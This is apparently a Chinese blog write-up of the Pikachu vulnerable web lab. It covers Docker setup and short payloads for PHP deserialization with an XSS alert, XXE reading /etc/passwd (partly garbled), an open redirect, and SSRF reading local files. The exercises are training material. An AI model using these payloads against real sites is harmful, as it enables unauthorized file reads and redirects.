pikachu靶场(完结)

pikachu靶场(完结)

pikachu靶场

环境

虚拟机192.168.48.130docker+centos8

安装

docker search pikachu docker pull area39/pikachu docker images vi pikachu.sh docker run -dt --name pikachu -p 80:80 --rm area39/pikachu chmod +x pikachu.sh ./pikachu docker ps ----------------------------------------------------------------- docker进入镜像 docker ps 查看containerid docker exec -it containerid /bin/bash mysql -u root -p

PHP反序列化

直接找个payload来用

O:1:"S":1:{s:4:"test";s:29:"alert('xss')";} //O:1 O代表object，1代表对象名字长度为1个字符 //S:1 S代表对象的名称，1代表对象里有1个变量 //s 数据类型，4 变量名称长度，test 变量名称

XXE

按照xml文档语法构造payload读取passwd文件```html/xml]>&xxe;

 # URL重定向 链接后带有url参数，修改url参数为跳转地址即可  要加http/https，其他几个链接后面没有url参数的加上就可以了 ```shell http://192.168.48.130/vul/urlredirect/urlredirect.php?url=http://baidu.com

服务器端请求伪造

服务器端请求伪造(curl)

先开这句话，发现没有诗出来，看了下url好像有些问题，多了个/vul，删除后即可

http://192.168.48.130/vul/***f/***f_curl.php?url=http://127.0.0.1/vul/vul/***f/***f_info/info1.php 'file=' 后开始

http://192.168.48.130/vul/***f/***f_fgc.php?file=///etc/passwd

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。